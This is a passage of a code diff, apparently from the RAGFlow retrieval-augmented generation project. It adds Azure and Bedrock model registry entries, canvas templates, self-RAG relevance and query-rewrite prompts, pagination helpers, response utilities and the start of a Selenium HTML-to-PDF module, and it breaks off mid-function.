"max_tokens": 16385,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-text-embedding-ada-002",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-text-embedding-3-small",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-text-embedding-3-large",
|
||||
"tags": "TEXT EMBEDDING,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},{
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-whisper-1",
|
||||
"tags": "SPEECH2TEXT",
|
||||
"max_tokens": 25 * 1024 * 1024,
|
||||
"model_type": LLMType.SPEECH2TEXT.value
|
||||
},
|
||||
{
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4",
|
||||
"tags": "LLM,CHAT,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4-turbo",
|
||||
"tags": "LLM,CHAT,8K",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4-32k",
|
||||
"tags": "LLM,CHAT,32K",
|
||||
"max_tokens": 32768,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[15]["name"],
|
||||
"llm_name": "azure-gpt-4-vision-preview",
|
||||
"tags": "LLM,CHAT,IMAGE2TEXT",
|
||||
"max_tokens": 765,
|
||||
"model_type": LLMType.IMAGE2TEXT.value
|
||||
},
|
||||
# ------------------------ Bedrock -----------------------
|
||||
{
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "ai21.j2-ultra-v1",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "ai21.j2-mid-v1",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8191,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.command-text-v14",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.command-light-text-v14",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.command-r-v1:0",
|
||||
"tags": "LLM,CHAT,128k",
|
||||
"max_tokens": 128 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.command-r-plus-v1:0",
|
||||
"tags": "LLM,CHAT,128k",
|
||||
"max_tokens": 128000,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-v2",
|
||||
"tags": "LLM,CHAT,100k",
|
||||
"max_tokens": 100 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-v2:1",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-3-sonnet-20240229-v1:0",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-3-5-sonnet-20240620-v1:0",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-3-haiku-20240307-v1:0",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-3-opus-20240229-v1:0",
|
||||
"tags": "LLM,CHAT,200k",
|
||||
"max_tokens": 200 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "anthropic.claude-instant-v1",
|
||||
"tags": "LLM,CHAT,100k",
|
||||
"max_tokens": 100 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "amazon.titan-text-express-v1",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "amazon.titan-text-premier-v1:0",
|
||||
"tags": "LLM,CHAT,32k",
|
||||
"max_tokens": 32 * 1024,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "amazon.titan-text-lite-v1",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "meta.llama2-13b-chat-v1",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "meta.llama2-70b-chat-v1",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "meta.llama3-8b-instruct-v1:0",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "meta.llama3-70b-instruct-v1:0",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "mistral.mistral-7b-instruct-v0:2",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "mistral.mixtral-8x7b-instruct-v0:1",
|
||||
"tags": "LLM,CHAT,4k",
|
||||
"max_tokens": 4096,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "mistral.mistral-large-2402-v1:0",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "mistral.mistral-small-2402-v1:0",
|
||||
"tags": "LLM,CHAT,8k",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.CHAT.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "amazon.titan-embed-text-v2:0",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 8192,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.embed-english-v3",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 2048,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
}, {
|
||||
"fid": factory_infos[16]["name"],
|
||||
"llm_name": "cohere.embed-multilingual-v3",
|
||||
"tags": "TEXT EMBEDDING",
|
||||
"max_tokens": 2048,
|
||||
"model_type": LLMType.EMBEDDING.value
|
||||
},
|
||||
]
|
||||
for info in factory_infos:
|
||||
try:
|
||||
@ -584,6 +947,20 @@ def init_llm_factory():
|
||||
"""
|
||||
|
||||
|
||||
def add_graph_templates():
|
||||
dir = os.path.join(get_project_base_directory(), "graph", "templates")
|
||||
for fnm in os.listdir(dir):
|
||||
try:
|
||||
cnvs = json.load(open(os.path.join(dir, fnm), "r"))
|
||||
try:
|
||||
CanvasTemplateService.save(**cnvs)
|
||||
except:
|
||||
CanvasTemplateService.update_by_id(cnvs["id"], cnvs)
|
||||
except Exception as e:
|
||||
print("Add graph templates error: ", e)
|
||||
print("------------", flush=True)
|
||||
|
||||
|
||||
def init_web_data():
|
||||
start_time = time.time()
|
||||
|
||||
@ -591,6 +968,7 @@ def init_web_data():
|
||||
if not UserService.get_all().count():
|
||||
init_superuser()
|
||||
|
||||
add_graph_templates()
|
||||
print("init web data success:{}".format(time.time() - start_time))
|
||||
|
||||
|
||||
|
||||
26
api/db/services/canvas_service.py
Normal file
26
api/db/services/canvas_service.py
Normal file
@ -0,0 +1,26 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from datetime import datetime
|
||||
import peewee
|
||||
from api.db.db_models import DB, API4Conversation, APIToken, Dialog, CanvasTemplate, UserCanvas
|
||||
from api.db.services.common_service import CommonService
|
||||
|
||||
|
||||
class CanvasTemplateService(CommonService):
|
||||
model = CanvasTemplate
|
||||
|
||||
class UserCanvasService(CommonService):
|
||||
model = UserCanvas
|
||||
@ -23,6 +23,7 @@ from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMService, TenantLLMService, LLMBundle
|
||||
from api.settings import chat_logger, retrievaler
|
||||
from rag.app.resume import forbidden_select_fields4resume
|
||||
from rag.nlp import keyword_extraction
|
||||
from rag.nlp.search import index_name
|
||||
from rag.utils import rmSpace, num_tokens_from_string, encoder
|
||||
|
||||
@ -80,7 +81,8 @@ def chat(dialog, messages, stream=True, **kwargs):
|
||||
if not llm:
|
||||
raise LookupError("LLM(%s) not found" % dialog.llm_id)
|
||||
max_tokens = 1024
|
||||
else: max_tokens = llm[0].max_tokens
|
||||
else:
|
||||
max_tokens = llm[0].max_tokens
|
||||
kbs = KnowledgebaseService.get_by_ids(dialog.kb_ids)
|
||||
embd_nms = list(set([kb.embd_id for kb in kbs]))
|
||||
if len(embd_nms) != 1:
|
||||
@ -110,20 +112,33 @@ def chat(dialog, messages, stream=True, **kwargs):
|
||||
prompt_config["system"] = prompt_config["system"].replace(
|
||||
"{%s}" % p["key"], " ")
|
||||
|
||||
rerank_mdl = None
|
||||
if dialog.rerank_id:
|
||||
rerank_mdl = LLMBundle(dialog.tenant_id, LLMType.RERANK, dialog.rerank_id)
|
||||
|
||||
for _ in range(len(questions) // 2):
|
||||
questions.append(questions[-1])
|
||||
if "knowledge" not in [p["key"] for p in prompt_config["parameters"]]:
|
||||
kbinfos = {"total": 0, "chunks": [], "doc_aggs": []}
|
||||
else:
|
||||
rerank_mdl = None
|
||||
if dialog.rerank_id:
|
||||
rerank_mdl = LLMBundle(dialog.tenant_id, LLMType.RERANK, dialog.rerank_id)
|
||||
if prompt_config.get("keyword", False):
|
||||
questions[-1] += keyword_extraction(chat_mdl, questions[-1])
|
||||
kbinfos = retrievaler.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
|
||||
dialog.similarity_threshold,
|
||||
dialog.vector_similarity_weight,
|
||||
doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
|
||||
top=1024, aggs=False, rerank_mdl=rerank_mdl)
|
||||
top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
|
||||
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
|
||||
#self-rag
|
||||
if dialog.prompt_config.get("self_rag") and not relevant(dialog.tenant_id, dialog.llm_id, questions[-1], knowledges):
|
||||
questions[-1] = rewrite(dialog.tenant_id, dialog.llm_id, questions[-1])
|
||||
kbinfos = retrievaler.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
|
||||
dialog.similarity_threshold,
|
||||
dialog.vector_similarity_weight,
|
||||
doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
|
||||
top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
|
||||
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
|
||||
|
||||
chat_logger.info(
|
||||
"{}->{}".format(" ".join(questions), "\n->".join(knowledges)))
|
||||
|
||||
@ -136,7 +151,7 @@ def chat(dialog, messages, stream=True, **kwargs):
|
||||
|
||||
msg = [{"role": "system", "content": prompt_config["system"].format(**kwargs)}]
|
||||
msg.extend([{"role": m["role"], "content": m["content"]}
|
||||
for m in messages if m["role"] != "system"])
|
||||
for m in messages if m["role"] != "system"])
|
||||
used_token_count, msg = message_fit_in(msg, int(max_tokens * 0.97))
|
||||
assert len(msg) >= 2, f"message_fit_in has bug: {msg}"
|
||||
|
||||
@ -150,9 +165,9 @@ def chat(dialog, messages, stream=True, **kwargs):
|
||||
if knowledges and (prompt_config.get("quote", True) and kwargs.get("quote", True)):
|
||||
answer, idx = retrievaler.insert_citations(answer,
|
||||
[ck["content_ltks"]
|
||||
for ck in kbinfos["chunks"]],
|
||||
for ck in kbinfos["chunks"]],
|
||||
[ck["vector"]
|
||||
for ck in kbinfos["chunks"]],
|
||||
for ck in kbinfos["chunks"]],
|
||||
embd_mdl,
|
||||
tkweight=1 - dialog.vector_similarity_weight,
|
||||
vtweight=dialog.vector_similarity_weight)
|
||||
@ -166,7 +181,7 @@ def chat(dialog, messages, stream=True, **kwargs):
|
||||
for c in refs["chunks"]:
|
||||
if c.get("vector"):
|
||||
del c["vector"]
|
||||
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api")>=0:
|
||||
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
|
||||
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
|
||||
return {"answer": answer, "reference": refs}
|
||||
|
||||
@ -204,7 +219,7 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
def get_table():
|
||||
nonlocal sys_prompt, user_promt, question, tried_times
|
||||
sql = chat_mdl.chat(sys_prompt, [{"role": "user", "content": user_promt}], {
|
||||
"temperature": 0.06})
|
||||
"temperature": 0.06})
|
||||
print(user_promt, sql)
|
||||
chat_logger.info(f"“{question}”==>{user_promt} get SQL: {sql}")
|
||||
sql = re.sub(r"[\r\n]+", " ", sql.lower())
|
||||
@ -273,17 +288,19 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
|
||||
# compose markdown table
|
||||
clmns = "|" + "|".join([re.sub(r"(/.*|([^()]+))", "", field_map.get(tbl["columns"][i]["name"],
|
||||
tbl["columns"][i]["name"])) for i in clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")
|
||||
tbl["columns"][i]["name"])) for i in
|
||||
clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")
|
||||
|
||||
line = "|" + "|".join(["------" for _ in range(len(clmn_idx))]) + \
|
||||
("|------|" if docid_idx and docid_idx else "")
|
||||
("|------|" if docid_idx and docid_idx else "")
|
||||
|
||||
rows = ["|" +
|
||||
"|".join([rmSpace(str(r[i])) for i in clmn_idx]).replace("None", " ") +
|
||||
"|" for r in tbl["rows"]]
|
||||
if quota:
|
||||
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
else: rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
else:
|
||||
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
rows = re.sub(r"T[0-9]{2}:[0-9]{2}:[0-9]{2}(\.[0-9]+Z)?\|", "|", rows)
|
||||
|
||||
if not docid_idx or not docnm_idx:
|
||||
@ -303,5 +320,40 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
return {
|
||||
"answer": "\n".join([clmns, line, rows]),
|
||||
"reference": {"chunks": [{"doc_id": r[docid_idx], "docnm_kwd": r[docnm_idx]} for r in tbl["rows"]],
|
||||
"doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in doc_aggs.items()]}
|
||||
"doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in
|
||||
doc_aggs.items()]}
|
||||
}
|
||||
|
||||
|
||||
def relevant(tenant_id, llm_id, question, contents: list):
|
||||
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
|
||||
prompt = """
|
||||
You are a grader assessing relevance of a retrieved document to a user question.
|
||||
It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
|
||||
If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
|
||||
Give a binary score 'yes' or 'no' score to indicate whether the document is relevant to the question.
|
||||
No other words needed except 'yes' or 'no'.
|
||||
"""
|
||||
if not contents:return False
|
||||
contents = "Documents: \n" + " - ".join(contents)
|
||||
contents = f"Question: {question}\n" + contents
|
||||
if num_tokens_from_string(contents) >= chat_mdl.max_length - 4:
|
||||
contents = encoder.decode(encoder.encode(contents)[:chat_mdl.max_length - 4])
|
||||
ans = chat_mdl.chat(prompt, [{"role": "user", "content": contents}], {"temperature": 0.01})
|
||||
if ans.lower().find("yes") >= 0: return True
|
||||
return False
|
||||
|
||||
|
||||
def rewrite(tenant_id, llm_id, question):
|
||||
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
|
||||
prompt = """
|
||||
You are an expert at query expansion to generate a paraphrasing of a question.
|
||||
I can't retrieval relevant information from the knowledge base by using user's question directly.
|
||||
You need to expand or paraphrase user's question by multiple ways such as using synonyms words/phrase,
|
||||
writing the abbreviation in its entirety, adding some extra descriptions or explanations,
|
||||
changing the way of expression, translating the original question into another language (English/Chinese), etc.
|
||||
And return 5 versions of question and one is from translation.
|
||||
Just list the question. No other words are needed.
|
||||
"""
|
||||
ans = chat_mdl.chat(prompt, [{"role": "user", "content": question}], {"temperature": 0.8})
|
||||
return ans
|
||||
|
||||
@ -59,6 +59,35 @@ class DocumentService(CommonService):
|
||||
|
||||
return list(docs.dicts()), count
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def list_documents_in_dataset(cls, dataset_id, offset, count, order_by, descend, keywords):
|
||||
if keywords:
|
||||
docs = cls.model.select().where(
|
||||
(cls.model.kb_id == dataset_id),
|
||||
(fn.LOWER(cls.model.name).contains(keywords.lower()))
|
||||
)
|
||||
else:
|
||||
docs = cls.model.select().where(cls.model.kb_id == dataset_id)
|
||||
|
||||
total = docs.count()
|
||||
|
||||
if descend == 'True':
|
||||
docs = docs.order_by(cls.model.getter_by(order_by).desc())
|
||||
if descend == 'False':
|
||||
docs = docs.order_by(cls.model.getter_by(order_by).asc())
|
||||
|
||||
docs = list(docs.dicts())
|
||||
docs_length = len(docs)
|
||||
|
||||
if offset < 0 or offset > docs_length:
|
||||
raise IndexError("Offset is out of the valid range.")
|
||||
|
||||
if count == -1:
|
||||
return docs[offset:], total
|
||||
|
||||
return docs[offset:offset + count], total
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def insert(cls, doc):
|
||||
@ -182,6 +211,19 @@ class DocumentService(CommonService):
|
||||
return
|
||||
return docs[0]["tenant_id"]
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_embd_id(cls, doc_id):
|
||||
docs = cls.model.select(
|
||||
Knowledgebase.embd_id).join(
|
||||
Knowledgebase, on=(
|
||||
Knowledgebase.id == cls.model.kb_id)).where(
|
||||
cls.model.id == doc_id, Knowledgebase.status == StatusEnum.VALID.value)
|
||||
docs = docs.dicts()
|
||||
if not docs:
|
||||
return
|
||||
return docs[0]["embd_id"]
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_doc_id_by_doc_name(cls, doc_name):
|
||||
|
||||
@ -164,12 +164,11 @@ class FileService(CommonService):
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_kb_folder(cls, tenant_id):
|
||||
for root in cls.model.select().where(cls.model.tenant_id == tenant_id and
|
||||
cls.model.parent_id == cls.model.id):
|
||||
for folder in cls.model.select().where(cls.model.tenant_id == tenant_id and
|
||||
cls.model.parent_id == root.id and
|
||||
cls.model.name == KNOWLEDGEBASE_FOLDER_NAME
|
||||
):
|
||||
for root in cls.model.select().where(
|
||||
(cls.model.tenant_id == tenant_id), (cls.model.parent_id == cls.model.id)):
|
||||
for folder in cls.model.select().where(
|
||||
(cls.model.tenant_id == tenant_id), (cls.model.parent_id == root.id),
|
||||
(cls.model.name == KNOWLEDGEBASE_FOLDER_NAME)):
|
||||
return folder.to_dict()
|
||||
assert False, "Can't find the KB folder. Database init error."
|
||||
|
||||
@ -304,4 +303,13 @@ class FileService(CommonService):
|
||||
"source_type": FileSource.KNOWLEDGEBASE
|
||||
}
|
||||
cls.save(**file)
|
||||
File2DocumentService.save(**{"id": get_uuid(), "file_id": file["id"], "document_id": doc["id"]})
|
||||
File2DocumentService.save(**{"id": get_uuid(), "file_id": file["id"], "document_id": doc["id"]})
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def move_file(cls, file_ids, folder_id):
|
||||
try:
|
||||
cls.filter_update((cls.model.id << file_ids, ), { 'parent_id': folder_id })
|
||||
except Exception as e:
|
||||
print(e)
|
||||
raise RuntimeError("Database error (File move)!")
|
||||
@ -40,6 +40,31 @@ class KnowledgebaseService(CommonService):
|
||||
|
||||
return list(kbs.dicts())
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_tenant_ids_by_offset(cls, joined_tenant_ids, user_id, offset, count, orderby, desc):
|
||||
kbs = cls.model.select().where(
|
||||
((cls.model.tenant_id.in_(joined_tenant_ids) & (cls.model.permission ==
|
||||
TenantPermission.TEAM.value)) | (
|
||||
cls.model.tenant_id == user_id))
|
||||
& (cls.model.status == StatusEnum.VALID.value)
|
||||
)
|
||||
if desc:
|
||||
kbs = kbs.order_by(cls.model.getter_by(orderby).desc())
|
||||
else:
|
||||
kbs = kbs.order_by(cls.model.getter_by(orderby).asc())
|
||||
|
||||
kbs = list(kbs.dicts())
|
||||
|
||||
kbs_length = len(kbs)
|
||||
if offset < 0 or offset > kbs_length:
|
||||
raise IndexError("Offset is out of the valid range.")
|
||||
|
||||
if count == -1:
|
||||
return kbs[offset:]
|
||||
|
||||
return kbs[offset:offset+count]
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_detail(cls, kb_id):
|
||||
|
||||
@ -82,9 +82,9 @@ class TenantLLMService(CommonService):
|
||||
if model_config: model_config = model_config.to_dict()
|
||||
if not model_config:
|
||||
if llm_type in [LLMType.EMBEDDING, LLMType.RERANK]:
|
||||
llm = LLMService.query(llm_name=llm_name)
|
||||
llm = LLMService.query(llm_name=llm_name if llm_name else mdlnm)
|
||||
if llm and llm[0].fid in ["Youdao", "FastEmbed", "BAAI"]:
|
||||
model_config = {"llm_factory": llm[0].fid, "api_key":"", "llm_name": llm_name, "api_base": ""}
|
||||
model_config = {"llm_factory": llm[0].fid, "api_key":"", "llm_name": llm_name if llm_name else mdlnm, "api_base": ""}
|
||||
if not model_config:
|
||||
if llm_name == "flag-embedding":
|
||||
model_config = {"llm_factory": "Tongyi-Qianwen", "api_key": "",
|
||||
|
||||
@ -13,6 +13,7 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import os
|
||||
import random
|
||||
|
||||
from api.db.db_utils import bulk_insert_into_db
|
||||
@ -102,6 +103,15 @@ class TaskService(CommonService):
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def update_progress(cls, id, info):
|
||||
if os.environ.get("MACOS"):
|
||||
if info["progress_msg"]:
|
||||
cls.model.update(progress_msg=cls.model.progress_msg + "\n" + info["progress_msg"]).where(
|
||||
cls.model.id == id).execute()
|
||||
if "progress" in info:
|
||||
cls.model.update(progress=info["progress"]).where(
|
||||
cls.model.id == id).execute()
|
||||
return
|
||||
|
||||
with DB.lock("update_progress", -1):
|
||||
if info["progress_msg"]:
|
||||
cls.model.update(progress_msg=cls.model.progress_msg + "\n" + info["progress_msg"]).where(
|
||||
|
||||
@ -69,6 +69,12 @@ default_llm = {
|
||||
"image2text_model": "gpt-4-vision-preview",
|
||||
"asr_model": "whisper-1",
|
||||
},
|
||||
"Azure-OpenAI": {
|
||||
"chat_model": "azure-gpt-35-turbo",
|
||||
"embedding_model": "azure-text-embedding-ada-002",
|
||||
"image2text_model": "azure-gpt-4-vision-preview",
|
||||
"asr_model": "azure-whisper-1",
|
||||
},
|
||||
"ZHIPU-AI": {
|
||||
"chat_model": "glm-3-turbo",
|
||||
"embedding_model": "embedding-2",
|
||||
@ -239,4 +245,5 @@ class RetCode(IntEnum, CustomEnum):
|
||||
RUNNING = 106
|
||||
PERMISSION_ERROR = 108
|
||||
AUTHENTICATION_ERROR = 109
|
||||
UNAUTHORIZED = 401
|
||||
SERVER_ERROR = 500
|
||||
|
||||
@ -38,7 +38,6 @@ from base64 import b64encode
|
||||
from hmac import HMAC
|
||||
from urllib.parse import quote, urlencode
|
||||
|
||||
|
||||
requests.models.complexjson.dumps = functools.partial(
|
||||
json.dumps, cls=CustomJSONEncoder)
|
||||
|
||||
@ -145,7 +144,7 @@ def server_error_response(e):
|
||||
if len(e.args) > 1:
|
||||
return get_json_result(
|
||||
retcode=RetCode.EXCEPTION_ERROR, retmsg=repr(e.args[0]), data=e.args[1])
|
||||
if repr(e).find("index_not_found_exception") >=0:
|
||||
if repr(e).find("index_not_found_exception") >= 0:
|
||||
return get_json_result(retcode=RetCode.EXCEPTION_ERROR, retmsg="No chunk found, please upload file and parse it.")
|
||||
|
||||
return get_json_result(retcode=RetCode.EXCEPTION_ERROR, retmsg=repr(e))
|
||||
@ -235,3 +234,36 @@ def cors_reponse(retcode=RetCode.SUCCESS,
|
||||
response.headers["Access-Control-Allow-Headers"] = "*"
|
||||
response.headers["Access-Control-Expose-Headers"] = "Authorization"
|
||||
return response
|
||||
|
||||
def construct_result(code=RetCode.DATA_ERROR, message='data is missing'):
|
||||
import re
|
||||
result_dict = {"code": code, "message": re.sub(r"rag", "seceum", message, flags=re.IGNORECASE)}
|
||||
response = {}
|
||||
for key, value in result_dict.items():
|
||||
if value is None and key != "code":
|
||||
continue
|
||||
else:
|
||||
response[key] = value
|
||||
return jsonify(response)
|
||||
|
||||
|
||||
def construct_json_result(code=RetCode.SUCCESS, message='success', data=None):
|
||||
if data is None:
|
||||
return jsonify({"code": code, "message": message})
|
||||
else:
|
||||
return jsonify({"code": code, "message": message, "data": data})
|
||||
|
||||
|
||||
def construct_error_response(e):
|
||||
stat_logger.exception(e)
|
||||
try:
|
||||
if e.code == 401:
|
||||
return construct_json_result(code=RetCode.UNAUTHORIZED, message=repr(e))
|
||||
except BaseException:
|
||||
pass
|
||||
if len(e.args) > 1:
|
||||
return construct_json_result(code=RetCode.EXCEPTION_ERROR, message=repr(e.args[0]), data=e.args[1])
|
||||
if repr(e).find("index_not_found_exception") >=0:
|
||||
return construct_json_result(code=RetCode.EXCEPTION_ERROR, message="No chunk found, please upload file and parse it.")
|
||||
|
||||
return construct_json_result(code=RetCode.EXCEPTION_ERROR, message=repr(e))
|
||||
|
||||
80
api/utils/web_utils.py
Normal file
80
api/utils/web_utils.py
Normal file
@ -0,0 +1,80 @@
|
||||
import re
|
||||
import json
|
||||
import base64
|
||||
|
||||
from selenium import webdriver
|
||||
from selenium.webdriver.chrome.options import Options
|
||||
from selenium.webdriver.chrome.service import Service
|
||||
from selenium.common.exceptions import TimeoutException
|
||||
from selenium.webdriver.support.ui import WebDriverWait
|
||||
from selenium.webdriver.support.expected_conditions import staleness_of
|
||||
from webdriver_manager.chrome import ChromeDriverManager
|
||||
from selenium.webdriver.common.by import By
|
||||
|
||||
|
||||
def html2pdf(
|
||||
source: str,
|
||||
timeout: int = 2,
|
||||
install_driver: bool = True,
|
||||
print_options: dict = {},
|
||||
):
|
||||
result = __get_pdf_from_html(source, timeout, install_driver, print_options)
|
||||
return result
|
||||
|
||||
|
||||
def __send_devtools(driver, cmd, params={}):
|
||||
